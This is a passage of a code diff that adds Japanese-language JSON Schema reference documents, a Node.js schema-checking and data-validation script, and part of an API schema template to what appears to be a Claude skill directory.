+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/json-schema/resources/schema-composition.md
+++ b/.claude/skills/json-schema/resources/schema-composition.md
@@ -1,0 +1,493 @@
+# スキーマ合成
+
+## 概要
+
+JSON Schemaの合成キーワード（allOf, oneOf, anyOf, not）を使った
+複雑なスキーマの構築方法を解説します。
+
+## allOf（すべて満たす）
+
+### 基本的な使用法
+
+```json
+{
+  "allOf": [
+    {
+      "type": "object",
+      "properties": {
+        "name": { "type": "string" }
+      },
+      "required": ["name"]
+    },
+    {
+      "type": "object",
+      "properties": {
+        "email": { "type": "string", "format": "email" }
+      },
+      "required": ["email"]
+    }
+  ]
+}
+
+// 有効なデータ
+{ "name": "John", "email": "john@example.com" }
+
+// 無効なデータ（nameが不足）
+{ "email": "john@example.com" }
+```
+
+### 継承パターン
+
+```json
+{
+  "$defs": {
+    "BaseEntity": {
+      "type": "object",
+      "properties": {
+        "id": { "type": "string", "format": "uuid" },
+        "createdAt": { "type": "string", "format": "date-time" },
+        "updatedAt": { "type": "string", "format": "date-time" }
+      },
+      "required": ["id", "createdAt", "updatedAt"]
+    },
+    "Auditable": {
+      "type": "object",
+      "properties": {
+        "createdBy": { "type": "string" },
+        "updatedBy": { "type": "string" }
+      }
+    }
+  },
+  "allOf": [
+    { "$ref": "#/$defs/BaseEntity" },
+    { "$ref": "#/$defs/Auditable" },
+    {
+      "type": "object",
+      "properties": {
+        "title": { "type": "string" },
+        "content": { "type": "string" }
+      },
+      "required": ["title"]
+    }
+  ]
+}
+```
+
+### プロパティのマージ
+
+```json
+{
+  "allOf": [
+    {
+      "type": "object",
+      "properties": {
+        "name": {
+          "type": "string",
+          "minLength": 1
+        }
+      }
+    },
+    {
+      "type": "object",
+      "properties": {
+        "name": {
+          "maxLength": 100
+        }
+      }
+    }
+  ]
+}
+
+// 結果: nameは minLength: 1 かつ maxLength: 100 を満たす必要がある
+```
+
+## oneOf（1つだけ満たす）
+
+### 排他的な選択
+
+```json
+{
+  "oneOf": [
+    {
+      "type": "object",
+      "properties": {
+        "type": { "const": "email" },
+        "email": { "type": "string", "format": "email" }
+      },
+      "required": ["type", "email"]
+    },
+    {
+      "type": "object",
+      "properties": {
+        "type": { "const": "phone" },
+        "phone": { "type": "string", "pattern": "^\\d{10,}$" }
+      },
+      "required": ["type", "phone"]
+    }
+  ]
+}
+
+// 有効
+{ "type": "email", "email": "user@example.com" }
+{ "type": "phone", "phone": "0901234567" }
+
+// 無効（両方満たす / どちらも満たさない）
+{ "type": "email", "email": "user@example.com", "phone": "0901234567" }
+{ "type": "fax" }
+```
+
+### discriminatorパターン
+
+```json
+{
+  "$defs": {
+    "Dog": {
+      "type": "object",
+      "properties": {
+        "petType": { "const": "dog" },
+        "breed": { "type": "string" },
+        "barkVolume": { "type": "integer" }
+      },
+      "required": ["petType", "breed"]
+    },
+    "Cat": {
+      "type": "object",
+      "properties": {
+        "petType": { "const": "cat" },
+        "breed": { "type": "string" },
+        "meowPitch": { "type": "integer" }
+      },
+      "required": ["petType", "breed"]
+    }
+  },
+  "oneOf": [
+    { "$ref": "#/$defs/Dog" },
+    { "$ref": "#/$defs/Cat" }
+  ]
+}
+```
+
+### 条件付き必須フィールド
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "deliveryMethod": {
+      "type": "string",
+      "enum": ["pickup", "shipping"]
+    },
+    "storeId": { "type": "string" },
+    "shippingAddress": {
+      "type": "object",
+      "properties": {
+        "street": { "type": "string" },
+        "city": { "type": "string" }
+      }
+    }
+  },
+  "required": ["deliveryMethod"],
+  "oneOf": [
+    {
+      "properties": {
+        "deliveryMethod": { "const": "pickup" }
+      },
+      "required": ["storeId"]
+    },
+    {
+      "properties": {
+        "deliveryMethod": { "const": "shipping" }
+      },
+      "required": ["shippingAddress"]
+    }
+  ]
+}
+```
+
+## anyOf（いずれか1つ以上満たす）
+
+### 柔軟な選択
+
+```json
+{
+  "anyOf": [
+    { "type": "string" },
+    { "type": "number" }
+  ]
+}
+
+// 有効
+"hello"
+42
+```
+
+### 複数の形式を許可
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "contact": {
+      "anyOf": [
+        {
+          "type": "object",
+          "properties": {
+            "email": { "type": "string", "format": "email" }
+          },
+          "required": ["email"]
+        },
+        {
+          "type": "object",
+          "properties": {
+            "phone": { "type": "string" }
+          },
+          "required": ["phone"]
+        }
+      ]
+    }
+  }
+}
+
+// 有効（email のみ）
+{ "contact": { "email": "user@example.com" } }
+
+// 有効（phone のみ）
+{ "contact": { "phone": "090-1234-5678" } }
+
+// 有効（両方）
+{ "contact": { "email": "user@example.com", "phone": "090-1234-5678" } }
+```
+
+## not（否定）
+
+### 特定の値を除外
+
+```json
+{
+  "not": {
+    "type": "null"
+  }
+}
+
+// 有効
+"hello"
+42
+{}
+[]
+
+// 無効
+null
+```
+
+### 特定のパターンを除外
+
+```json
+{
+  "type": "string",
+  "not": {
+    "pattern": "^admin"
+  }
+}
+
+// 有効
+"user123"
+"guest"
+
+// 無効
+"admin"
+"adminUser"
+```
+
+### 複合否定
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "status": { "type": "string" }
+  },
+  "not": {
+    "properties": {
+      "status": { "const": "deleted" }
+    },
+    "required": ["status"]
+  }
+}
+```
+
+## 条件付きスキーマ（if/then/else）
+
+### 基本構文
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "country": { "type": "string" },
+    "postalCode": { "type": "string" }
+  },
+  "if": {
+    "properties": {
+      "country": { "const": "Japan" }
+    },
+    "required": ["country"]
+  },
+  "then": {
+    "properties": {
+      "postalCode": { "pattern": "^\\d{3}-\\d{4}$" }
+    }
+  },
+  "else": {
+    "properties": {
+      "postalCode": { "pattern": "^[A-Z0-9\\- ]+$" }
+    }
+  }
+}
+```
+
+### 複数条件
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "type": { "enum": ["personal", "business", "government"] },
+    "taxId": { "type": "string" },
+    "duns": { "type": "string" }
+  },
+  "allOf": [
+    {
+      "if": {
+        "properties": { "type": { "const": "business" } }
+      },
+      "then": {
+        "required": ["taxId"]
+      }
+    },
+    {
+      "if": {
+        "properties": { "type": { "const": "government" } }
+      },
+      "then": {
+        "required": ["duns"]
+      }
+    }
+  ]
+}
+```
+
+## 依存スキーマ
+
+### dependentSchemas
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "creditCard": { "type": "string" },
+    "billingAddress": {
+      "type": "object",
+      "properties": {
+        "street": { "type": "string" },
+        "city": { "type": "string" }
+      }
+    }
+  },
+  "dependentSchemas": {
+    "creditCard": {
+      "required": ["billingAddress"],
+      "properties": {
+        "billingAddress": {
+          "required": ["street", "city"]
+        }
+      }
+    }
+  }
+}
+```
+
+### dependentRequired
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "name": { "type": "string" },
+    "creditCard": { "type": "string" },
+    "billingAddress": { "type": "string" }
+  },
+  "dependentRequired": {
+    "creditCard": ["billingAddress"]
+  }
+}
+
+// creditCard があれば billingAddress も必要
+```
+
+## 実践パターン
+
+### 状態に応じたバリデーション
+
+```json
+{
+  "$defs": {
+    "Draft": {
+      "type": "object",
+      "properties": {
+        "status": { "const": "draft" },
+        "title": { "type": "string" }
+      },
+      "required": ["status"]
+    },
+    "Published": {
+      "type": "object",
+      "properties": {
+        "status": { "const": "published" },
+        "title": { "type": "string", "minLength": 1 },
+        "content": { "type": "string", "minLength": 100 },
+        "publishedAt": { "type": "string", "format": "date-time" }
+      },
+      "required": ["status", "title", "content", "publishedAt"]
+    }
+  },
+  "oneOf": [
+    { "$ref": "#/$defs/Draft" },
+    { "$ref": "#/$defs/Published" }
+  ]
+}
+```
+
+### バージョン管理されたスキーマ
+
+```json
+{
+  "oneOf": [
+    {
+      "type": "object",
+      "properties": {
+        "version": { "const": "1.0" },
+        "data": { "$ref": "#/$defs/v1Data" }
+      },
+      "required": ["version", "data"]
+    },
+    {
+      "type": "object",
+      "properties": {
+        "version": { "const": "2.0" },
+        "data": { "$ref": "#/$defs/v2Data" }
+      },
+      "required": ["version", "data"]
+    }
+  ],
+  "$defs": {
+    "v1Data": { },
+    "v2Data": { }
+  }
+}
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/json-schema/resources/validation-keywords.md
+++ b/.claude/skills/json-schema/resources/validation-keywords.md
@@ -1,0 +1,414 @@
+# バリデーションキーワード
+
+## 概要
+
+JSON Schemaの各種バリデーションキーワードのリファレンスです。
+Draft 2020-12に準拠しています。
+
+## 型キーワード
+
+### type
+
+```json
+// 単一型
+{ "type": "string" }
+{ "type": "number" }
+{ "type": "integer" }
+{ "type": "boolean" }
+{ "type": "array" }
+{ "type": "object" }
+{ "type": "null" }
+
+// 複数型（Nullable）
+{ "type": ["string", "null"] }
+
+// 任意の型を許可
+{ }  // type を省略
+```
+
+### enum / const
+
+```json
+// 列挙型
+{
+  "enum": ["pending", "active", "suspended"]
+}
+
+// 定数
+{
+  "const": "fixed-value"
+}
+
+// 列挙型の型指定
+{
+  "type": "string",
+  "enum": ["small", "medium", "large"]
+}
+```
+
+## 文字列キーワード
+
+### 長さ制約
+
+```json
+{
+  "type": "string",
+  "minLength": 1,      // 最小長（含む）
+  "maxLength": 100     // 最大長（含む）
+}
+```
+
+### パターン
+
+```json
+{
+  "type": "string",
+  "pattern": "^[a-zA-Z0-9_]+$"
+}
+
+// 一般的なパターン
+{ "pattern": "^[a-z]+$" }           // 小文字英字のみ
+{ "pattern": "^\\d{3}-\\d{4}$" }    // 郵便番号
+{ "pattern": "^[A-Z]{2}\\d{6}$" }   // パスポート番号風
+```
+
+### フォーマット
+
+```json
+// 日時
+{ "format": "date-time" }    // 2024-01-15T10:30:00Z
+{ "format": "date" }         // 2024-01-15
+{ "format": "time" }         // 10:30:00
+{ "format": "duration" }     // P1DT12H
+
+// ネットワーク
+{ "format": "email" }        // user@example.com
+{ "format": "idn-email" }    // 日本語@example.com
+{ "format": "hostname" }     // example.com
+{ "format": "idn-hostname" } // 日本語.jp
+{ "format": "ipv4" }         // 192.168.1.1
+{ "format": "ipv6" }         // 2001:db8::1
+
+// URI
+{ "format": "uri" }          // https://example.com/path
+{ "format": "uri-reference" }// /path/to/resource
+{ "format": "iri" }          // 国際化URI
+{ "format": "iri-reference" }// 国際化URI参照
+{ "format": "uri-template" } // /users/{id}
+
+// その他
+{ "format": "uuid" }         // 550e8400-e29b-41d4-a716-446655440000
+{ "format": "json-pointer" } // /foo/bar/0
+{ "format": "relative-json-pointer" } // 1/foo
+{ "format": "regex" }        // ^[a-z]+$
+```
+
+### コンテンツ
+
+```json
+{
+  "type": "string",
+  "contentMediaType": "application/json",
+  "contentEncoding": "base64"
+}
+```
+
+## 数値キーワード
+
+### 範囲制約
+
+```json
+{
+  "type": "number",
+  "minimum": 0,           // 最小値（含む）
+  "maximum": 100,         // 最大値（含む）
+  "exclusiveMinimum": 0,  // 最小値（含まない）
+  "exclusiveMaximum": 100 // 最大値（含まない）
+}
+
+// 例: 0より大きく100未満
+{
+  "type": "number",
+  "exclusiveMinimum": 0,
+  "exclusiveMaximum": 100
+}
+```
+
+### 倍数
+
+```json
+{
+  "type": "number",
+  "multipleOf": 0.01    // 小数点2桁
+}
+
+{
+  "type": "integer",
+  "multipleOf": 5       // 5の倍数
+}
+```
+
+## 配列キーワード
+
+### 要素制約
+
+```json
+{
+  "type": "array",
+  "items": { "type": "string" },   // 全要素の型
+  "minItems": 1,                    // 最小要素数
+  "maxItems": 10,                   // 最大要素数
+  "uniqueItems": true               // 重複禁止
+}
+```
+
+### タプル（位置指定）
+
+```json
+{
+  "type": "array",
+  "prefixItems": [
+    { "type": "string" },   // 1番目の要素
+    { "type": "integer" },  // 2番目の要素
+    { "type": "boolean" }   // 3番目の要素
+  ],
+  "items": false            // 追加要素を禁止
+}
+
+// 追加要素を許可
+{
+  "type": "array",
+  "prefixItems": [
+    { "type": "string" },
+    { "type": "integer" }
+  ],
+  "items": { "type": "string" }  // 3番目以降はstring
+}
+```
+
+### 含有チェック
+
+```json
+{
+  "type": "array",
+  "contains": {
+    "type": "object",
+    "properties": {
+      "type": { "const": "admin" }
+    }
+  },
+  "minContains": 1,    // 最低1つ含む
+  "maxContains": 3     // 最大3つまで
+}
+```
+
+### 未評価要素
+
+```json
+{
+  "allOf": [
+    {
+      "type": "array",
+      "prefixItems": [{ "type": "string" }]
+    }
+  ],
+  "unevaluatedItems": false  // allOf で評価されなかった追加要素を禁止
+}
+```
+
+## オブジェクトキーワード
+
+### プロパティ制約
+
+```json
+{
+  "type": "object",
+  "properties": {
+    "name": { "type": "string" },
+    "age": { "type": "integer" }
+  },
+  "required": ["name"],           // 必須プロパティ
+  "additionalProperties": false   // 追加プロパティを禁止
+}
+```
+
+### プロパティ数制約
+
+```json
+{
+  "type": "object",
+  "minProperties": 1,   // 最小プロパティ数
+  "maxProperties": 10   // 最大プロパティ数
+}
+```
+
+### プロパティ名制約
+
+```json
+{
+  "type": "object",
+  "propertyNames": {
+    "pattern": "^[a-z][a-zA-Z0-9]*$"  // camelCaseのみ許可
+  }
+}
+```
+
+### パターンプロパティ
+
+```json
+{
+  "type": "object",
+  "patternProperties": {
+    "^S_": { "type": "string" },    // S_で始まるプロパティはstring
+    "^I_": { "type": "integer" },   // I_で始まるプロパティはinteger
+    "^B_": { "type": "boolean" }    // B_で始まるプロパティはboolean
+  },
+  "additionalProperties": false
+}
+```
+
+### 追加プロパティ制御
+
+```json
+// 追加プロパティを禁止
+{ "additionalProperties": false }
+
+// 追加プロパティの型を指定
+{ "additionalProperties": { "type": "string" } }
+
+// 追加プロパティを許可（デフォルト）
+{ "additionalProperties": true }
+```
+
+### 未評価プロパティ
+
+```json
+{
+  "allOf": [
+    {
+      "type": "object",
+      "properties": {
+        "name": { "type": "string" }
+      }
+    }
+  ],
+  "unevaluatedProperties": false  // allOf で評価されなかった追加プロパティを禁止
+}
+```
+
+### 依存関係
+
+```json
+// 必須依存
+{
+  "type": "object",
+  "dependentRequired": {
+    "creditCard": ["billingAddress"]  // creditCardがあればbillingAddressも必須
+  }
+}
+
+// スキーマ依存
+{
+  "type": "object",
+  "dependentSchemas": {
+    "creditCard": {
+      "properties": {
+        "billingAddress": {
+          "type": "object",
+          "required": ["street", "city"]
+        }
+      },
+      "required": ["billingAddress"]
+    }
+  }
+}
+```
+
+## 条件キーワード
+
+### if / then / else
+
+```json
+{
+  "if": {
+    "properties": {
+      "country": { "const": "Japan" }
+    },
+    "required": ["country"]
+  },
+  "then": {
+    "properties": {
+      "postalCode": { "pattern": "^\\d{3}-\\d{4}$" }
+    }
+  },
+  "else": {
+    "properties": {
+      "postalCode": { "pattern": "^[A-Z0-9\\- ]+$" }
+    }
+  }
+}
+```
+
+## 合成キーワード
+
+### allOf
+
+```json
+{
+  "allOf": [
+    { "$ref": "#/$defs/base" },
+    { "$ref": "#/$defs/extension" }
+  ]
+}
+```
+
+### oneOf
+
+```json
+{
+  "oneOf": [
+    { "$ref": "#/$defs/typeA" },
+    { "$ref": "#/$defs/typeB" }
+  ]
+}
+```
+
+### anyOf
+
+```json
+{
+  "anyOf": [
+    { "type": "string" },
+    { "type": "number" }
+  ]
+}
+```
+
+### not
+
+```json
+{
+  "not": { "type": "null" }
+}
+```
+
+## アノテーションキーワード
+
+```json
+{
+  "title": "ユーザー名",
+  "description": "システム内で一意なユーザー識別名",
+  "default": "anonymous",
+  "examples": ["john_doe", "jane_smith"],
+  "deprecated": false,
+  "readOnly": false,
+  "writeOnly": false,
+  "$comment": "内部メモ：このフィールドはv2.0で削除予定"
+}
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/json-schema/scripts/validate-json-schema.mjs
+++ b/.claude/skills/json-schema/scripts/validate-json-schema.mjs
@@ -1,0 +1,493 @@
+#!/usr/bin/env node
+/**
+ * JSON Schema検証スクリプト
+ * JSON Schemaファイルの構文と品質をチェックします
+ *
+ * 使用方法:
+ *   node validate-json-schema.mjs <schema.json> [--validate-data=<data.json>] [--strict]
+ *
+ * オプション:
+ *   --validate-data=<file>  指定したJSONファイルをスキーマで検証
+ *   --strict                厳格モードでチェック
+ *   --json                  JSON形式で出力
+ */
+
+import { readFileSync, existsSync } from 'fs';
+import { resolve, basename } from 'path';
+
+// スキーマ検証ルール
+const SCHEMA_RULES = {
+  // 必須メタデータ
+  metadata: {
+    required: ['$schema'],
+    recommended: ['$id', 'title', 'description'],
+    message: 'スキーマにメタデータが不足しています',
+    severity: 'warning',
+  },
+
+  // プロパティ定義
+  properties: {
+    requiredDescription: true,
+    message: 'プロパティに説明が不足しています',
+    severity: 'info',
+  },
+
+  // 型定義
+  types: {
+    preferExplicit: true,
+    message: '明示的な型定義を推奨します',
+    severity: 'info',
+  },
+
+  // additionalProperties
+  additionalProperties: {
+    preferFalse: true,
+    message: 'additionalPropertiesの設定を推奨します',
+    severity: 'warning',
+  },
+
+  // 参照
+  references: {
+    checkValid: true,
+    message: '無効な参照があります',
+    severity: 'error',
+  },
+};
+
+// 検証結果
+const issues = [];
+
+// メタデータをチェック
+function checkMetadata(schema, path = '') {
+  if (!schema.$schema) {
+    issues.push({
+      path: path || 'root',
+      rule: 'metadata',
+      message: '$schemaが指定されていません',
+      severity: 'error',
+    });
+  }
+
+  if (!schema.$id) {
+    issues.push({
+      path: path || 'root',
+      rule: 'metadata',
+      message: '$idの指定を推奨します',
+      severity: 'info',
+    });
+  }
+
+  if (!schema.title && !schema.description) {
+    issues.push({
+      path: path || 'root',
+      rule: 'metadata',
+      message: 'titleまたはdescriptionの指定を推奨します',
+      severity: 'info',
+    });
+  }
+}
+
+// プロパティをチェック
+function checkProperties(schema, path = '', strict = false) {
+  if (schema.type === 'object' && schema.properties) {
+    for (const [propName, propSchema] of Object.entries(schema.properties)) {
+      const propPath = `${path}/properties/${propName}`;
+
+      // 説明がない
+      if (strict && !propSchema.description && !propSchema.$ref) {
+        issues.push({
+          path: propPath,
+          rule: 'properties',
+          message: `プロパティ "${propName}" に説明がありません`,
+          severity: 'info',
+        });
+      }
+
+      // 型がない
+      if (!propSchema.type && !propSchema.$ref && !propSchema.oneOf && !propSchema.anyOf && !propSchema.allOf) {
+        issues.push({
+          path: propPath,
+          rule: 'types',
+          message: `プロパティ "${propName}" に型が指定されていません`,
+          severity: 'warning',
+        });
+      }
+
+      // 再帰的にチェック
+      checkProperties(propSchema, propPath, strict);
+    }
+
+    // additionalPropertiesのチェック
+    if (schema.additionalProperties === undefined && strict) {
+      issues.push({
+        path: path || 'root',
+        rule: 'additionalProperties',
+        message: 'additionalPropertiesの明示的な設定を推奨します',
+        severity: 'info',
+      });
+    }
+  }
+
+  // 配列のitemsをチェック
+  if (schema.type === 'array' && schema.items) {
+    checkProperties(schema.items, `${path}/items`, strict);
+  }
+
+  // $defsをチェック
+  if (schema.$defs) {
+    for (const [defName, defSchema] of Object.entries(schema.$defs)) {
+      checkProperties(defSchema, `${path}/$defs/${defName}`, strict);
+    }
+  }
+}
+
+// 参照を検証
+function checkReferences(schema, defs = {}, path = '') {
+  if (typeof schema !== 'object' || schema === null) return;
+
+  // $refをチェック
+  if (schema.$ref) {
+    const ref = schema.$ref;
+    if (ref.startsWith('#/')) {
+      // ローカル参照の検証
+      const refPath = ref.substring(2).split('/');
+      let target = null;
+
+      // $defsへの参照をチェック
+      if (refPath[0] === '$defs' && refPath.length === 2) {
+        target = defs[refPath[1]];
+      }
+
+      if (!target && ref.includes('$defs')) {
+        issues.push({
+          path: path,
+          rule: 'references',
+          message: `参照 "${ref}" が見つかりません`,
+          severity: 'error',
+        });
+      }
+    }
+  }
+
+  // 再帰的にチェック
+  for (const [key, value] of Object.entries(schema)) {
+    if (key === '$defs') continue;
+    if (typeof value === 'object' && value !== null) {
+      if (Array.isArray(value)) {
+        value.forEach((item, index) => {
+          checkReferences(item, defs, `${path}/${key}/${index}`);
+        });
+      } else {
+        checkReferences(value, defs, `${path}/${key}`);
+      }
+    }
+  }
+}
+
+// 循環参照をチェック
+function checkCircularReferences(schema) {
+  const visited = new Set();
+  const stack = new Set();
+
+  function visit(obj, path = '') {
+    if (typeof obj !== 'object' || obj === null) return;
+
+    const id = JSON.stringify(obj).substring(0, 100);
+    if (stack.has(id)) {
+      issues.push({
+        path,
+        rule: 'references',
+        message: '循環参照の可能性があります',
+        severity: 'warning',
+      });
+      return;
+    }
+
+    if (visited.has(id)) return;
+
+    visited.add(id);
+    stack.add(id);
+
+    for (const [key, value] of Object.entries(obj)) {
+      visit(value, `${path}/${key}`);
+    }
+
+    stack.delete(id);
+  }
+
+  visit(schema);
+}
+
+// スキーマを検証
+function validateSchema(schema, options = {}) {
+  issues.length = 0;
+
+  checkMetadata(schema);
+  checkProperties(schema, '', options.strict);
+  checkReferences(schema, schema.$defs || {});
+  checkCircularReferences(schema);
+
+  return issues;
+}
+
+// データをスキーマで検証（簡易実装）
+function validateData(schema, data) {
+  const errors = [];
+
+  function validate(schemaNode, dataNode, path = '') {
+    if (schemaNode.$ref) {
+      // 参照解決（簡易）
+      if (schemaNode.$ref.startsWith('#/$defs/')) {
+        const defName = schemaNode.$ref.split('/').pop();
+        schemaNode = schema.$defs?.[defName] || schemaNode;
+      }
+    }
+
+    // 型チェック
+    if (schemaNode.type) {
+      const expectedTypes = Array.isArray(schemaNode.type) ? schemaNode.type : [schemaNode.type];
+      const actualType = dataNode === null ? 'null' : Array.isArray(dataNode) ? 'array' : typeof dataNode;
+
+      if (!expectedTypes.includes(actualType)) {
+        errors.push({
+          path: path || 'root',
+          expected: expectedTypes.join(' | '),
+          actual: actualType,
+          message: `型が一致しません: 期待=${expectedTypes.join(' | ')}, 実際=${actualType}`,
+        });
+        return;
+      }
+    }
+
+    // オブジェクトのプロパティチェック
+    if (schemaNode.type === 'object' && schemaNode.properties) {
+      // 必須チェック
+      if (schemaNode.required) {
+        for (const req of schemaNode.required) {
+          if (!(req in dataNode)) {
+            errors.push({
+              path: `${path}/${req}`,
+              message: `必須プロパティ "${req}" がありません`,
+            });
+          }
+        }
+      }
+
+      // プロパティ検証
+      for (const [propName, propSchema] of Object.entries(schemaNode.properties)) {
+        if (propName in dataNode) {
+          validate(propSchema, dataNode[propName], `${path}/${propName}`);
+        }
+      }
+
+      // additionalPropertiesチェック
+      if (schemaNode.additionalProperties === false) {
+        const allowedKeys = Object.keys(schemaNode.properties);
+        for (const key of Object.keys(dataNode)) {
+          if (!allowedKeys.includes(key)) {
+            errors.push({
+              path: `${path}/${key}`,
+              message: `未定義のプロパティ "${key}" があります`,
+            });
+          }
+        }
+      }
+    }
+
+    // 配列のitemsチェック
+    if (schemaNode.type === 'array' && schemaNode.items && Array.isArray(dataNode)) {
+      dataNode.forEach((item, index) => {
+        validate(schemaNode.items, item, `${path}[${index}]`);
+      });
+    }
+
+    // 文字列制約
+    if (schemaNode.type === 'string' && typeof dataNode === 'string') {
+      if (schemaNode.minLength !== undefined && dataNode.length < schemaNode.minLength) {
+        errors.push({
+          path,
+          message: `文字列が短すぎます: 最小=${schemaNode.minLength}, 実際=${dataNode.length}`,
+        });
+      }
+      if (schemaNode.maxLength !== undefined && dataNode.length > schemaNode.maxLength) {
+        errors.push({
+          path,
+          message: `文字列が長すぎます: 最大=${schemaNode.maxLength}, 実際=${dataNode.length}`,
+        });
+      }
+      if (schemaNode.pattern && !new RegExp(schemaNode.pattern).test(dataNode)) {
+        errors.push({
+          path,
+          message: `パターンに一致しません: ${schemaNode.pattern}`,
+        });
+      }
+    }
+
+    // 数値制約
+    if ((schemaNode.type === 'number' || schemaNode.type === 'integer') && typeof dataNode === 'number') {
+      if (schemaNode.minimum !== undefined && dataNode < schemaNode.minimum) {
+        errors.push({
+          path,
+          message: `値が小さすぎます: 最小=${schemaNode.minimum}, 実際=${dataNode}`,
+        });
+      }
+      if (schemaNode.maximum !== undefined && dataNode > schemaNode.maximum) {
+        errors.push({
+          path,
+          message: `値が大きすぎます: 最大=${schemaNode.maximum}, 実際=${dataNode}`,
+        });
+      }
+    }
+
+    // enum/const
+    if (schemaNode.enum && !schemaNode.enum.includes(dataNode)) {
+      errors.push({
+        path,
+        message: `値が列挙型に含まれていません: ${schemaNode.enum.join(', ')}`,
+      });
+    }
+    if (schemaNode.const !== undefined && dataNode !== schemaNode.const) {
+      errors.push({
+        path,
+        message: `定数値と一致しません: 期待=${schemaNode.const}`,
+      });
+    }
+  }
+
+  validate(schema, data);
+  return errors;
+}
+
+// 結果をフォーマット
+function formatResults(schemaIssues, dataErrors = null, options = {}) {
+  if (options.json) {
+    return JSON.stringify({ schemaIssues, dataErrors }, null, 2);
+  }
+
+  let output = '\n📋 JSON Schema 検証結果\n';
+  output += '═'.repeat(60) + '\n';
+
+  // スキーマの問題
+  if (schemaIssues.length === 0) {
+    output += '\n✅ スキーマに問題は見つかりませんでした\n';
+  } else {
+    const grouped = {
+      error: schemaIssues.filter((i) => i.severity === 'error'),
+      warning: schemaIssues.filter((i) => i.severity === 'warning'),
+      info: schemaIssues.filter((i) => i.severity === 'info'),
+    };
+
+    const labels = {
+      error: '❌ エラー',
+      warning: '⚠️  警告',
+      info: '💡 情報',
+    };
+
+    for (const [severity, items] of Object.entries(grouped)) {
+      if (items.length === 0) continue;
+
+      output += `\n${labels[severity]} (${items.length}件)\n`;
+      output += '─'.repeat(60) + '\n';
+
+      for (const item of items) {
+        output += `  📍 ${item.path}\n`;
+        output += `     ${item.message}\n`;
+      }
+    }
+  }
+
+  // データ検証結果
+  if (dataErrors !== null) {
+    output += '\n' + '═'.repeat(60) + '\n';
+    output += '📊 データ検証結果\n';
+    output += '─'.repeat(60) + '\n';
+
+    if (dataErrors.length === 0) {
+      output += '✅ データはスキーマに適合しています\n';
+    } else {
+      output += `❌ ${dataErrors.length}件のエラー\n\n`;
+      for (const err of dataErrors) {
+        output += `  📍 ${err.path}\n`;
+        output += `     ${err.message}\n`;
+      }
+    }
+  }
+
+  output += '\n' + '═'.repeat(60) + '\n';
+
+  return output;
+}
+
+// メイン処理
+function main() {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0 || args.includes('--help')) {
+    console.log(`
+JSON Schema検証スクリプト
+
+使用方法:
+  node validate-json-schema.mjs <schema.json> [options]
+
+オプション:
+  --validate-data=<file>  指定したJSONファイルをスキーマで検証
+  --strict                厳格モードでチェック
+  --json                  JSON形式で出力
+  --help                  ヘルプを表示
+
+例:
+  node validate-json-schema.mjs schema.json
+  node validate-json-schema.mjs schema.json --strict
+  node validate-json-schema.mjs schema.json --validate-data=data.json
+
+検証内容:
+  - メタデータ（$schema, $id, title, description）
+  - プロパティ定義の完全性
+  - 参照の有効性
+  - 循環参照の検出
+  - 型定義の明示性
+`);
+    process.exit(0);
+  }
+
+  const schemaFile = resolve(args.find((a) => !a.startsWith('--')));
+  const dataFileArg = args.find((a) => a.startsWith('--validate-data='));
+  const dataFile = dataFileArg ? resolve(dataFileArg.split('=')[1]) : null;
+  const options = {
+    strict: args.includes('--strict'),
+    json: args.includes('--json'),
+  };
+
+  try {
+    // スキーマを読み込み
+    if (!existsSync(schemaFile)) {
+      throw new Error(`スキーマファイルが見つかりません: ${schemaFile}`);
+    }
+    const schema = JSON.parse(readFileSync(schemaFile, 'utf-8'));
+
+    // スキーマを検証
+    const schemaIssues = validateSchema(schema, options);
+
+    // データ検証
+    let dataErrors = null;
+    if (dataFile) {
+      if (!existsSync(dataFile)) {
+        throw new Error(`データファイルが見つかりません: ${dataFile}`);
+      }
+      const data = JSON.parse(readFileSync(dataFile, 'utf-8'));
+      dataErrors = validateData(schema, data);
+    }
+
+    console.log(formatResults(schemaIssues, dataErrors, options));
+
+    // 終了コード
+    const hasErrors = schemaIssues.some((i) => i.severity === 'error') ||
+                     (dataErrors && dataErrors.length > 0);
+    process.exit(hasErrors ? 1 : 0);
+  } catch (error) {
+    console.error(`❌ エラー: ${error.message}`);
+    process.exit(1);
+  }
+}
+
+main();

--- a/.claude/skills/json-schema/templates/api-schema-template.json
+++ b/.claude/skills/json-schema/templates/api-schema-template.json
@@ -1,0 +1,311 @@
+{
+  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  "$id": "https://example.com/schemas/api/v1/",
+  "title": "API Schema Template",
+  "description": "APIスキーマのテンプレート",
+
+  "$defs": {
+    "uuid": {
+      "type": "string",
+      "format": "uuid",
+      "description": "UUID形式の識別子"
+    },
+
+    "timestamp": {
+      "type": "string",
+      "format": "date-time",
+      "description": "ISO 8601形式のタイムスタンプ"
+    },
+
+    "email": {
+      "type": "string",
+      "format": "email",
+      "maxLength": 254,
+      "description": "メールアドレス"
+    },
+
+    "pagination": {
+      "type": "object",
+      "properties": {
+        "page": {
+          "type": "integer",
+          "minimum": 1,
+          "default": 1,
+          "description": "ページ番号"
+        },
+        "pageSize": {
+          "type": "integer",
+          "minimum": 1,
+          "maximum": 100,
+          "default": 20,
+          "description": "1ページあたりの件数"
+        },
+        "total": {
+          "type": "integer",
+          "minimum": 0,
+          "description": "総件数"
+        },
+        "hasMore": {
+          "type": "boolean",
+          "description": "次のページが存在するか"
+        }
+      },
+      "required": ["page", "pageSize", "total"]
+    },
+
+    "baseEntity": {
+      "type": "object",
+      "properties": {
+        "id": {
+          "$ref": "#/$defs/uuid",
+          "readOnly": true
+        },
+        "createdAt": {
+          "$ref": "#/$defs/timestamp",
+          "readOnly": true,
+          "description": "作成日時"
+        },
+        "updatedAt": {
+          "$ref": "#/$defs/timestamp",
+          "readOnly": true,
